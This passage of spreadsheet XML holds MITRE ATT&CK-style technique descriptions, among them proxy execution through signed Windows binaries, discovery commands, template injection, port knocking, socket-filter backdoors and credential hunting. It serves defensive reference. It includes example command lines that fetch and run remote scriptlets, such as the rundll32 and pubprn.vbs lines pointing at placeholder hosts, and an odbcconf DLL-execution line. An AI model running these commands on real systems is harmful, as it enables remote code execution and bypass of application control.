Mshta.exe can be used to bypass application control solutions that do not account for its potential use. Since mshta.exe executes outside of the Internet Explorer's security context, it also bypasses browser security settings. (Citation: LOLBAS Mshta)</t>
  </si>
  <si>
    <t>Adversaries may abuse msiexec.exe to proxy execution of malicious payloads. Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi).(Citation: Microsoft msiexec) The Msiexec.exe binary may also be digitally signed by Microsoft.
Adversaries may abuse msiexec.exe to launch local or network accessible MSI files. Msiexec.exe can also execute DLLs.(Citation: LOLBAS Msiexec)(Citation: TrendMicro Msiexec Feb 2018) Since it may be signed and native on Windows systems, msiexec.exe can be used to bypass application control solutions that do not account for its potential abuse. Msiexec.exe execution may also be elevated to SYSTEM privileges if the &lt;code&gt;AlwaysInstallElevated&lt;/code&gt; policy is enabled.(Citation: Microsoft AlwaysInstallElevated 2018)</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may abuse odbcconf.exe to proxy execution of malicious payloads. Odbcconf.exe is a Windows utility that allows you to configure Open Database Connectivity (ODBC) drivers and data source names.(Citation: Microsoft odbcconf.exe) The Odbcconf.exe binary may be digitally signed by Microsoft.
Adversaries may abuse odbcconf.exe to bypass application control solutions that do not account for its potential abuse. Similar to [Regsvr32](https://attack.mitre.org/techniques/T1218/010), odbcconf.exe has a &lt;code&gt;REGSVR&lt;/code&gt; flag that can be misused to execute DLLs (ex: &lt;code&gt;odbcconf.exe /S /A &amp;lbrace;REGSVR "C:\Users\Public\file.dll"&amp;rbrace;&lt;/code&gt;). (Citation: LOLBAS Odbcconf)(Citation: TrendMicro Squiblydoo Aug 2017)(Citation: TrendMicro Cobalt Group Nov 2017) 
</t>
  </si>
  <si>
    <t>Adversaries may abuse Regsvcs and Regasm to proxy execution of code through a trusted Windows utility. Regsvcs and Regasm are Windows command-line utilities that are used to register .NET [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM) assemblies. Both are binaries that may be digitally signed by Microsoft. (Citation: MSDN Regsvcs) (Citation: MSDN Regasm)
Both utilities may be used to bypass application control through use of attributes within the binary to specify code that should be run before registration or unregistration: &lt;code&gt;[ComRegisterFunction]&lt;/code&gt; or &lt;code&gt;[ComUnregisterFunction]&lt;/code&gt; respectively. The code with the registration and unregistration attributes will be executed even if the process is run under insufficient privileges and fails to execute. (Citation: LOLBAS Regsvcs)(Citation: LOLBAS Regasm)</t>
  </si>
  <si>
    <t>Adversaries may abuse Regsvr32.exe to proxy execution of malicious code. Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. The Regsvr32.exe binary may also be signed by Microsoft. (Citation: Microsoft Regsvr32)
Malicious usage of Regsvr32.exe may avoid triggering security tools that may not monitor execution of, and modules loaded by, the regsvr32.exe process because of allowlists or false positives from Windows using regsvr32.exe for normal operations. Regsvr32.exe can also be used to specifically bypass application control using functionality to load COM scriptlets to execute DLLs under user permissions. Since Regsvr32.exe is network and proxy aware, the scripts can be loaded by passing a uniform resource locator (URL) to file on an external Web server as an argument during invocation. This method makes no changes to the Registry as the COM object is not actually registered, only executed. (Citation: LOLBAS Regsvr32) This variation of the technique is often referred to as a "Squiblydoo" and has been used in campaigns targeting governments. (Citation: Carbon Black Squiblydoo Apr 2016) (Citation: FireEye Regsvr32 Targeting Mongolian Gov)
Regsvr32.exe can also be leveraged to register a COM Object used to establish persistence via [Component Object Model Hijacking](https://attack.mitre.org/techniques/T1546/015). (Citation: Carbon Black Squiblydoo Apr 2016)</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. [Shared Modules](https://attack.mitre.org/techniques/T1129)), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads (ex: &lt;code&gt;rundll32.exe {DLLname, DLLfunction}&lt;/code&gt;).
Rundll32.exe can also be used to execute [Control Panel](https://attack.mitre.org/techniques/T1218/002) Item files (.cpl) through the undocumented shell32.dll functions &lt;code&gt;Control_RunDLL&lt;/code&gt; and &lt;code&gt;Control_RunDLLAsUser&lt;/code&gt;. Double-clicking a .cpl file also causes rundll32.exe to execute. (Citation: Trend Micro CPL)
Rundll32 can also be used to execute scripts such as JavaScript. This can be done using a syntax similar to this: &lt;code&gt;rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https[:]//www[.]example[.]com/malicious.sct")"&lt;/code&gt;  This behavior has been seen used by malware such as Poweliks. (Citation: This is Security Command Line Confusion)
Adversaries may also attempt to obscure malicious code from analysis by abusing the manner in which rundll32.exe loads DLL function names. As part of Windows compatibility support for various character sets, rundll32.exe will first check for wide/Unicode then ANSI character-supported functions before loading the specified function (e.g., given the command &lt;code&gt;rundll32.exe ExampleDLL.dll, ExampleFunction&lt;/code&gt;, rundll32.exe would first attempt to execute &lt;code&gt;ExampleFunctionW&lt;/code&gt;, or failing that &lt;code&gt;ExampleFunctionA&lt;/code&gt;, before loading &lt;code&gt;ExampleFunction&lt;/code&gt;). Adversaries may therefore obscure malicious code by creating multiple identical exported function names and appending &lt;code&gt;W&lt;/code&gt; and/or &lt;code&gt;A&lt;/code&gt; to harmless ones.(Citation: Attackify Rundll32.exe Obscurity)(Citation: Github NoRunDll) DLL functions can also be exported and executed by an ordinal number (ex: &lt;code&gt;rundll32.exe file.dll,#1&lt;/code&gt;).
Additionally, adversaries may use [Masquerading](https://attack.mitre.org/techniques/T1036) techniques (such as changing DLL file names, file extensions, or function names) to further conceal execution of a malicious payload.(Citation: rundll32.exe defense evasion) </t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may abuse verclsid.exe to proxy execution of malicious code. Verclsid.exe is known as the Extension CLSID Verification Host and is responsible for verifying each shell extension before they are used by Windows Explorer or the Windows Shell.(Citation: WinOSBite verclsid.exe)
Adversaries may abuse verclsid.exe to execute malicious payloads. This may be achieved by running &lt;code&gt;verclsid.exe /S /C {CLSID}&lt;/code&gt;, where the file is referenced by a Class ID (CLSID), a unique identification number used to identify COM objects. COM payloads executed by verclsid.exe may be able to perform various malicious actions, such as loading and executing COM scriptlets (SCT) from remote servers (similar to [Regsvr32](https://attack.mitre.org/techniques/T1218/010)). Since the binary may be signed and/or native on Windows systems, proxying execution via verclsid.exe may bypass application control solutions that do not account for its potential abuse.(Citation: LOLBAS Verclsid)(Citation: Red Canary Verclsid.exe)(Citation: BOHOPS Abusing the COM Registry)(Citation: Nick Tyrer GitHub) </t>
  </si>
  <si>
    <t>An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from [System Information Discovery](https://attack.mitre.org/techniques/T1082) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tools such as [Systeminfo](https://attack.mitre.org/software/S0096) can be used to gather detailed system information. If running with privileged access, a breakdown of system data can be gathered through the &lt;code&gt;systemsetup&lt;/code&gt; configuration tool on macOS. As an example, adversaries with user-level access can execute the &lt;code&gt;df -aH&lt;/code&gt; command to obtain currently mounted disks and associated freely available space. Adversaries may also leverage a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) on network devices to gather detailed system information (e.g. &lt;code&gt;show version&lt;/code&gt;).(Citation: US-CERT-TA18-106A) [System Information Discovery](https://attack.mitre.org/techniques/T1082) combined with information gathered from other forms of discovery and reconnaissance can drive payload development and concealment.(Citation: OSX.FairyTale)(Citation: 20 macOS Common Tools and Techniques)
Infrastructure as a Service (IaaS) cloud providers such as AWS, GCP, and Azure allow access to instance and virtual machine information via APIs. Successful authenticated API calls can return data such as the operating system platform and status of a particular instance or the model view of a virtual machine.(Citation: Amazon Describe Instance)(Citation: Google Instances Resource)(Citation: Microsoft Virutal Machine API)</t>
  </si>
  <si>
    <t xml:space="preserve">
Adversaries may gather information in an attempt to calculate the geographical location of a victim host. Adversaries may use the information from [System Location Discovery](https://attack.mitre.org/techniques/T1614) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Adversaries may attempt to infer the location of a system using various system checks, such as time zone, keyboard layout, and/or language settings.(Citation: FBI Ragnar Locker 2020)(Citation: Sophos Geolocation 2016)(Citation: Bleepingcomputer RAT malware 2020) Windows API functions such as &lt;code&gt;GetLocaleInfoW&lt;/code&gt; can also be used to determine the locale of the host.(Citation: FBI Ragnar Locker 2020) In cloud environments, an instance's availability zone may also be discovered by accessing the instance metadata service from the instance.(Citation: AWS Instance Identity Documents)(Citation: Microsoft Azure Instance Metadata 2021)
Adversaries may also attempt to infer the location of a victim host using IP addressing, such as via online geolocation IP-lookup services.(Citation: Securelist Trasparent Tribe 2020)(Citation: Sophos Geolocation 2016)</t>
  </si>
  <si>
    <t>Adversaries may attempt to gather information about the system language of a victim in order to infer the geographical location of that host. This information may be used to shape follow-on behaviors, including whether the adversary infects the target and/or attempts specific actions. This decision may be employed by malware developers and operators to reduce their risk of attracting the attention of specific law enforcement agencies or prosecution/scrutiny from other entities.(Citation: Malware System Language Check)
There are various sources of data an adversary could use to infer system language, such as system defaults and keyboard layouts. Specific checks will vary based on the target and/or adversary, but may involve behaviors such as [Query Registry](https://attack.mitre.org/techniques/T1012) and calls to [Native API](https://attack.mitre.org/techniques/T1106) functions.(Citation: CrowdStrike Ryuk January 2019) 
For example, on a Windows system adversaries may attempt to infer the language of a system by querying the registry key &lt;code&gt;HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Nls\Language&lt;/code&gt; or parsing the outputs of Windows API functions &lt;code&gt;GetUserDefaultUILanguage&lt;/code&gt;, &lt;code&gt;GetSystemDefaultUILanguage&lt;/code&gt;, &lt;code&gt;GetKeyboardLayoutList&lt;/code&gt; and &lt;code&gt;GetUserDefaultLangID&lt;/code&gt;.(Citation: Darkside Ransomware Cybereason)(Citation: Securelist JSWorm)(Citation: SecureList SynAck Doppelgänging May 2018)
On a macOS or Linux system, adversaries may query &lt;code&gt;locale&lt;/code&gt; to retrieve the value of the &lt;code&gt;$LANG&lt;/code&gt; environment variable.</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include [Arp](https://attack.mitre.org/software/S0099), [ipconfig](https://attack.mitre.org/software/S0100)/[ifconfig](https://attack.mitre.org/software/S0101), [nbtstat](https://attack.mitre.org/software/S0102), and [route](https://attack.mitre.org/software/S0103).
Adversaries may also leverage a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) on network devices to gather information about configurations and settings, such as IP addresses of configured interfaces and static/dynamic routes (e.g. &lt;code&gt;show ip route&lt;/code&gt;, &lt;code&gt;show ip interface&lt;/code&gt;).(Citation: US-CERT-TA18-106A)(Citation: Mandiant APT41 Global Intrusion )
Adversaries may use the information from [System Network Configuration Discovery](https://attack.mitre.org/techniques/T1016) during automated discovery to shape follow-on behaviors, including determining certain access within the target network and what actions to do next. </t>
  </si>
  <si>
    <t>Adversaries may check for Internet connectivity on compromised systems. This may be performed during automated discovery and can be accomplished in numerous ways such as using [Ping](https://attack.mitre.org/software/S0097), &lt;code&gt;tracert&lt;/code&gt;, and GET requests to websites.
Adversaries may use the results and responses from these requests to determine if the system is capable of communicating with their C2 servers before attempting to connect to them. The results may also be used to identify routes, redirectors, and proxy servers.</t>
  </si>
  <si>
    <t>Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network. 
An adversary who gains access to a system that is part of a cloud-based environment may map out Virtual Private Clouds or Virtual Networks in order to determine what systems and services are connected. The actions performed are likely the same types of discovery techniques depending on the operating system, but the resulting information may include details about the networked cloud environment relevant to the adversary's goals. Cloud providers may have different ways in which their virtual networks operate.(Citation: Amazon AWS VPC Guide)(Citation: Microsoft Azure Virtual Network Overview)(Citation: Google VPC Overview) Similarly, adversaries who gain access to network devices may also perform similar discovery activities to gather information about connected systems and services.
Utilities and commands that acquire this information include [netstat](https://attack.mitre.org/software/S0104), "net use," and "net session" with [Net](https://attack.mitre.org/software/S0039). In Mac and Linux, [netstat](https://attack.mitre.org/software/S0104) and &lt;code&gt;lsof&lt;/code&gt; can be used to list current connections. &lt;code&gt;who -a&lt;/code&gt; and &lt;code&gt;w&lt;/code&gt; can be used to show which users are currently logged in, similar to "net session". Additionally, built-in features native to network devices and [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) may be used (e.g. &lt;code&gt;show ip sockets&lt;/code&gt;, &lt;code&gt;show tcp brief&lt;/code&gt;).(Citation: US-CERT-TA18-106A)</t>
  </si>
  <si>
    <t>Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using [OS Credential Dumping](https://attack.mitre.org/techniques/T1003). The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Various utilities and commands may acquire this information, including &lt;code&gt;whoami&lt;/code&gt;. In macOS and Linux, the currently logged in user can be identified with &lt;code&gt;w&lt;/code&gt; and &lt;code&gt;who&lt;/code&gt;. On macOS the &lt;code&gt;dscl . list /Users | grep -v '_'&lt;/code&gt; command can also be used to enumerate user accounts. Environment variables, such as &lt;code&gt;%USERNAME%&lt;/code&gt; and &lt;code&gt;$USER&lt;/code&gt;, may also be used to access this information.</t>
  </si>
  <si>
    <t>Adversaries may use trusted scripts, often signed with certificates, to proxy the execution of malicious files. Several Microsoft signed scripts that have been downloaded from Microsoft or are default on Windows installations can be used to proxy execution of other files.(Citation: LOLBAS Project) This behavior may be abused by adversaries to execute malicious files that could bypass application control and signature validation on systems.(Citation: GitHub Ultimate AppLocker Bypass List)</t>
  </si>
  <si>
    <t>Adversaries may use PubPrn to proxy execution of malicious remote files. PubPrn.vbs is a [Visual Basic](https://attack.mitre.org/techniques/T1059/005) script that publishes a printer to Active Directory Domain Services. The script may be signed by Microsoft and is commonly executed through the [Windows Command Shell](https://attack.mitre.org/techniques/T1059/003) via &lt;code&gt;Cscript.exe&lt;/code&gt;. For example, the following code publishes a printer within the specified domain: &lt;code&gt;cscript pubprn Printer1 LDAP://CN=Container1,DC=Domain1,DC=Com&lt;/code&gt;.(Citation: pubprn)
Adversaries may abuse PubPrn to execute malicious payloads hosted on remote sites.(Citation: Enigma0x3 PubPrn Bypass) To do so, adversaries may set the second &lt;code&gt;script:&lt;/code&gt; parameter to reference a scriptlet file (.sct) hosted on a remote site. An example command is &lt;code&gt;pubprn.vbs 127.0.0.1 script:https://mydomain.com/folder/file.sct&lt;/code&gt;. This behavior may bypass signature validation restrictions and application control solutions that do not account for abuse of this script.
In later versions of Windows (10+), &lt;code&gt;PubPrn.vbs&lt;/code&gt; has been updated to prevent proxying execution from a remote site. This is done by limiting the protocol specified in the second parameter to &lt;code&gt;LDAP://&lt;/code&gt;, vice the &lt;code&gt;script:&lt;/code&gt; moniker which could be used to reference remote code via HTTP(S).</t>
  </si>
  <si>
    <t>Adversaries may try to gather information about registered local system services. Adversaries may obtain information about services using tools as well as OS utility commands such as &lt;code&gt;sc query&lt;/code&gt;, &lt;code&gt;tasklist /svc&lt;/code&gt;, &lt;code&gt;systemctl --type=service&lt;/code&gt;, and &lt;code&gt;net start&lt;/code&gt;.
Adversaries may use the information from [System Service Discovery](https://attack.mitre.org/techniques/T1007) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.</t>
  </si>
  <si>
    <t>Adversaries may abuse system services or daemons to execute commands or programs. Adversaries can execute malicious content by interacting with or creating services either locally or remotely. Many services are set to run at boot, which can aid in achieving persistence ([Create or Modify System Process](https://attack.mitre.org/techniques/T1543)), but adversaries can also abuse services for one-time or temporary execution.</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may abuse launchctl to execute commands or programs. Launchctl interfaces with launchd, the service management framework for macOS. Launchctl supports taking subcommands on the command-line, interactively, or even redirected from standard input.(Citation: Launchctl Man)
Adversaries use launchctl to execute commands and programs as [Launch Agent](https://attack.mitre.org/techniques/T1543/001)s or [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)s. Common subcommands include: &lt;code&gt;launchctl load&lt;/code&gt;,&lt;code&gt;launchctl unload&lt;/code&gt;, and &lt;code&gt;launchctl start&lt;/code&gt;. Adversaries can use scripts or manually run the commands &lt;code&gt;launchctl load -w "%s/Library/LaunchAgents/%s"&lt;/code&gt; or &lt;code&gt;/bin/launchctl load&lt;/code&gt; to execute [Launch Agent](https://attack.mitre.org/techniques/T1543/001)s or [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)s.(Citation: Sofacy Komplex Trojan)(Citation: 20 macOS Common Tools and Techniques)
</t>
  </si>
  <si>
    <t>Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager (&lt;code&gt;services.exe&lt;/code&gt;) is an interface to manage and manipulate services.(Citation: Microsoft Service Control Manager) The service control manager is accessible to users via GUI components as well as system utilities such as &lt;code&gt;sc.exe&lt;/code&gt; and [Net](https://attack.mitre.org/software/S0039).
[PsExec](https://attack.mitre.org/software/S0029) can also be used to execute commands or payloads via a temporary Windows service created through the service control manager API.(Citation: Russinovich Sysinternals) Tools such as [PsExec](https://attack.mitre.org/software/S0029) and &lt;code&gt;sc.exe&lt;/code&gt; can accept remote servers as arguments and may be used to conduct remote execution.
Adversaries may leverage these mechanisms to execute malicious content. This can be done by either executing a new or modified service. This technique is the execution used in conjunction with [Windows Service](https://attack.mitre.org/techniques/T1543/003) during service persistence or privilege escalation.</t>
  </si>
  <si>
    <t>Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) (e.g. &lt;code&gt;reload&lt;/code&gt;).(Citation: Microsoft Shutdown Oct 2017)(Citation: alert_TA18_106A) Shutting down or rebooting systems may disrupt access to computer resources for legitimate users.
Adversaries may attempt to shutdown/reboot a system after impacting it in other ways, such as [Disk Structure Wipe](https://attack.mitre.org/techniques/T1561/002) or [Inhibit System Recovery](https://attack.mitre.org/techniques/T1490), to hasten the intended effects on system availability.(Citation: Talos Nyetya June 2017)(Citation: Talos Olympic Destroyer 2018)</t>
  </si>
  <si>
    <t>An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network. (Citation: MSDN System Time) (Citation: Technet Windows Time Service)
System time information may be gathered in a number of ways, such as with [Net](https://attack.mitre.org/software/S0039) on Windows by performing &lt;code&gt;net time \\hostname&lt;/code&gt; to gather the system time on a remote system. The victim's time zone may also be inferred from the current system time or gathered by using &lt;code&gt;w32tm /tz&lt;/code&gt;. (Citation: Technet Windows Time Service)
This information could be useful for performing other techniques, such as executing a file with a [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053) (Citation: RSA EU12 They're Inside), or to discover locality information based on time zone to assist in victim targeting (i.e. [System Location Discovery](https://attack.mitre.org/techniques/T1614)). Adversaries may also use knowledge of system time as part of a time bomb, or delaying execution until a specified date/time.(Citation: AnyRun TimeBomb)</t>
  </si>
  <si>
    <t xml:space="preserve">
Adversaries may deliver payloads to remote systems by adding content to shared storage locations, such as network drives or internal code repositories. Content stored on network drives or in other shared locations may be tainted by adding malicious programs, scripts, or exploit code to otherwise valid files. Once a user opens the shared tainted content, the malicious portion can be executed to run the adversary's code on a remote system. Adversaries may use tainted shared content to move laterally.
A directory share pivot is a variation on this technique that uses several other techniques to propagate malware when users access a shared network directory. It uses [Shortcut Modification](https://attack.mitre.org/techniques/T1547/009) of directory .LNK files that use [Masquerading](https://attack.mitre.org/techniques/T1036) to look like the real directories, which are hidden through [Hidden Files and Directories](https://attack.mitre.org/techniques/T1564/001). The malicious .LNK-based directories have an embedded command that executes the hidden malware file in the directory and then opens the real intended directory so that the user's expected action still occurs. When used with frequently used network directories, the technique may result in frequent reinfections and broad access to systems and potentially to new and higher privileged accounts. (Citation: Retwin Directory Share Pivot)
Adversaries may also compromise shared network directories through binary infections by appending or prepending its code to the healthy binary on the shared network directory. The malware may modify the original entry point (OEP) of the healthy binary to ensure that it is executed before the legitimate code. The infection could continue to spread via the newly infected file when it is executed by a remote system. These infections may target both binary and non-binary formats that end with extensions including, but not limited to, .EXE, .DLL, .SCR, .BAT, and/or .VBS.</t>
  </si>
  <si>
    <t>Adversaries may create or modify references in user document templates to conceal malicious code or force authentication attempts. For example, Microsoft’s Office Open XML (OOXML) specification defines an XML-based format for Office documents (.docx, xlsx, .pptx) to replace older binary formats (.doc, .xls, .ppt). OOXML files are packed together ZIP archives compromised of various XML files, referred to as parts, containing properties that collectively define how a document is rendered.(Citation: Microsoft Open XML July 2017)
Properties within parts may reference shared public resources accessed via online URLs. For example, template properties may reference a file, serving as a pre-formatted document blueprint, that is fetched when the document is loaded.
Adversaries may abuse these templates to initially conceal malicious code to be executed via user documents. Template references injected into a document may enable malicious payloads to be fetched and executed when the document is loaded.(Citation: SANS Brian Wiltse Template Injection) These documents can be delivered via other techniques such as [Phishing](https://attack.mitre.org/techniques/T1566) and/or [Taint Shared Content](https://attack.mitre.org/techniques/T1080) and may evade static detections since no typical indicators (VBA macro, script, etc.) are present until after the malicious payload is fetched.(Citation: Redxorblue Remote Template Injection) Examples have been seen in the wild where template injection was used to load malicious code containing an exploit.(Citation: MalwareBytes Template Injection OCT 2017)
Adversaries may also modify the &lt;code&gt;*\template&lt;/code&gt; control word within an .rtf file to similarly conceal then download malicious code. This legitimate control word value is intended to be a file destination of a template file resource that is retrieved and loaded when an .rtf file is opened. However, adversaries may alter the bytes of an existing .rtf file to insert a template control word field to include a URL resource of a malicious payload.(Citation: Proofpoint RTF Injection)(Citation: Ciberseguridad Decoding malicious RTF files)
This technique may also enable [Forced Authentication](https://attack.mitre.org/techniques/T1187) by injecting a SMB/HTTPS (or other credential prompting) URL and triggering an authentication attempt.(Citation: Anomali Template Injection MAR 2018)(Citation: Talos Template Injection July 2017)(Citation: ryhanson phishery SEPT 2016)</t>
  </si>
  <si>
    <t>Adversaries may use traffic signaling to hide open ports or other malicious functionality used for persistence or command and control. Traffic signaling involves the use of a magic value or sequence that must be sent to a system to trigger a special response, such as opening a closed port or executing a malicious task. This may take the form of sending a series of packets with certain characteristics before a port will be opened that the adversary can use for command and control. Usually this series of packets consists of attempted connections to a predefined sequence of closed ports (i.e. [Port Knocking](https://attack.mitre.org/techniques/T1205/001)), but can involve unusual flags, specific strings, or other unique characteristics. After the sequence is completed, opening a port may be accomplished by the host-based firewall, but could also be implemented by custom software.
Adversaries may also communicate with an already open port, but the service listening on that port will only respond to commands or trigger other malicious functionality if passed the appropriate magic value(s).
The observation of the signal packets to trigger the communication can be conducted through different methods. One means, originally implemented by Cd00r (Citation: Hartrell cd00r 2002), is to use the libpcap libraries to sniff for the packets in question. Another method leverages raw sockets, which enables the malware to use ports that are already open for use by other programs.
On network devices, adversaries may use crafted packets to enable [Network Device Authentication](https://attack.mitre.org/techniques/T1556/004) for standard services offered by the device such as telnet.  Such signaling may also be used to open a closed service port such as telnet, or to trigger module modification of malware implants on the device, adding, removing, or changing malicious capabilities.  Adversaries may use crafted packets to attempt to connect to one or more (open or closed) ports, but may also attempt to connect to a router interface, broadcast, and network address IP on the same port in order to achieve their goals and objectives.(Citation: Cisco Synful Knock Evolution)(Citation: Mandiant - Synful Knock)(Citation: Cisco Blog Legacy Device Attacks)  To enable this traffic signaling on embedded devices, adversaries must first achieve and leverage [Patch System Image](https://attack.mitre.org/techniques/T1601/001) due to the monolithic nature of the architecture.
Adversaries may also use the Wake-on-LAN feature to turn on powered off systems. Wake-on-LAN is a hardware feature that allows a powered down system to be powered on, or woken up, by sending a magic packet to it. Once the system is powered on, it may become a target for lateral movement.(Citation: Bleeping Computer - Ryuk WoL)(Citation: AMD Magic Packet)</t>
  </si>
  <si>
    <t>Adversaries may use port knocking to hide open ports used for persistence or command and control. To enable a port, an adversary sends a series of attempted connections to a predefined sequence of closed ports. After the sequence is completed, opening a port is often accomplished by the host based firewall, but could also be implemented by custom software.
This technique has been observed both for the dynamic opening of a listening port as well as the initiating of a connection to a listening server on a different system.
The observation of the signal packets to trigger the communication can be conducted through different methods. One means, originally implemented by Cd00r (Citation: Hartrell cd00r 2002), is to use the libpcap libraries to sniff for the packets in question. Another method leverages raw sockets, which enables the malware to use ports that are already open for use by other programs.</t>
  </si>
  <si>
    <t>Adversaries may attach filters to a network socket to monitor then activate backdoors used for persistence or command and control. With elevated permissions, adversaries can use features such as the `libpcap` library to open sockets and install filters to allow or disallow certain types of data to come through the socket. The filter may apply to all traffic passing through the specified network interface (or every interface if not specified). When the network interface receives a packet matching the filter criteria, additional actions can be triggered on the host, such as activation of a reverse shell.
To establish a connection, an adversary sends a crafted packet to the targeted host that matches the installed filter criteria.(Citation: haking9 libpcap network sniffing) Adversaries have used these socket filters to trigger the installation of implants, conduct ping backs, and to invoke command shells. Communication with these socket filters may also be used in conjunction with [Protocol Tunneling](https://attack.mitre.org/techniques/T1572).(Citation: exatrack bpf filters passive backdoors)(Citation: Leonardo Turla Penquin May 2020)
Filters can be installed on any Unix-like platform with `libpcap` installed or on Windows hosts using `Winpcap`.  Adversaries may use either `libpcap` with `pcap_setfilter` or the standard library function `setsockopt` with `SO_ATTACH_FILTER` options. Since the socket connection is not active until the packet is received, this behavior may be difficult to detect due to the lack of activity on a host, low CPU overhead, and limited visibility into raw socket usage.</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may exfiltrate data by transferring the data, including backups of cloud environments, to another cloud account they control on the same service to avoid typical file transfers/downloads and network-based exfiltration detection.
A defender who is monitoring for large transfers to outside the cloud environment through normal file transfers or over command and control channels may not be watching for data transfers to another account within the same cloud provider. Such transfers may utilize existing cloud provider APIs and the internal address space of the cloud provider to blend into normal traffic or avoid data transfers over external network interfaces.
Incidents have been observed where adversaries have created backups of cloud instances and transferred them to separate accounts.(Citation: DOJ GRU Indictment Jul 2018) </t>
  </si>
  <si>
    <t>Adversaries may take advantage of trusted developer utilities to proxy execution of malicious payloads. There are many utilities used for software development related tasks that can be used to execute code in various forms to assist in development, debugging, and reverse engineering.(Citation: engima0x3 DNX Bypass)(Citation: engima0x3 RCSI Bypass)(Citation: Exploit Monday WinDbg)(Citation: LOLBAS Tracker) These utilities may often be signed with legitimate certificates that allow them to execute on a system and proxy execution of malicious code through a trusted process that effectively bypasses application control solutions.</t>
  </si>
  <si>
    <t>Adversaries may use MSBuild to proxy execution of code through a trusted Windows utility. MSBuild.exe (Microsoft Build Engine) is a software build platform used by Visual Studio. It handles XML formatted project files that define requirements for loading and building various platforms and configurations.(Citation: MSDN MSBuild)
Adversaries can abuse MSBuild to proxy execution of malicious code. The inline task capability of MSBuild that was introduced in .NET version 4 allows for C# or Visual Basic code to be inserted into an XML project file.(Citation: MSDN MSBuild)(Citation: Microsoft MSBuild Inline Tasks 2017) MSBuild will compile and execute the inline task. MSBuild.exe is a signed Microsoft binary, so when it is used this way it can execute arbitrary code and bypass application control defenses that are configured to allow MSBuild.exe execution.(Citation: LOLBAS Msbuild)</t>
  </si>
  <si>
    <t>Adversaries may breach or otherwise leverage organizations who have access to intended victims. Access through trusted third party relationship abuses an existing connection that may not be protected or receives less scrutiny than standard mechanisms of gaining access to a network.
Organizations often grant elevated access to second or third-party external providers in order to allow them to manage internal systems as well as cloud-based environments. Some examples of these relationships include IT services contractors, managed security providers, infrastructure contractors (e.g. HVAC, elevators, physical security). The third-party provider's access may be intended to be limited to the infrastructure being maintained, but may exist on the same network as the rest of the enterprise. As such, [Valid Accounts](https://attack.mitre.org/techniques/T1078) used by the other party for access to internal network systems may be compromised and used.(Citation: CISA IT Service Providers)
In Office 365 environments, organizations may grant Microsoft partners or resellers delegated administrator permissions. By compromising a partner or reseller account, an adversary may be able to leverage existing delegated administrator relationships or send new delegated administrator offers to clients in order to gain administrative control over the victim tenant.(Citation: Office 365 Delegated Administration)</t>
  </si>
  <si>
    <t>Adversaries may search compromised systems to find and obtain insecurely stored credentials. These credentials can be stored and/or misplaced in many locations on a system, including plaintext files (e.g. [Bash History](https://attack.mitre.org/techniques/T1552/003)), operating system or application-specific repositories (e.g. [Credentials in Registry](https://attack.mitre.org/techniques/T1552/002)), or other specialized files/artifacts (e.g. [Private Keys](https://attack.mitre.org/techniques/T1552/004)).</t>
  </si>
  <si>
    <t>Adversaries may search the bash command history on compromised systems for insecurely stored credentials. Bash keeps track of the commands users type on the command-line with the "history" utility. Once a user logs out, the history is flushed to the user’s &lt;code&gt;.bash_history&lt;/code&gt; file. For each user, this file resides at the same location: &lt;code&gt;~/.bash_history&lt;/code&gt;. Typically, this file keeps track of the user’s last 500 commands. Users often type usernames and passwords on the command-line as parameters to programs, which then get saved to this file when they log out. Adversaries can abuse this by looking through the file for potential credentials. (Citation: External to DA, the OS X Way)</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may attempt to access the Cloud Instance Metadata API to collect credentials and other sensitive data.
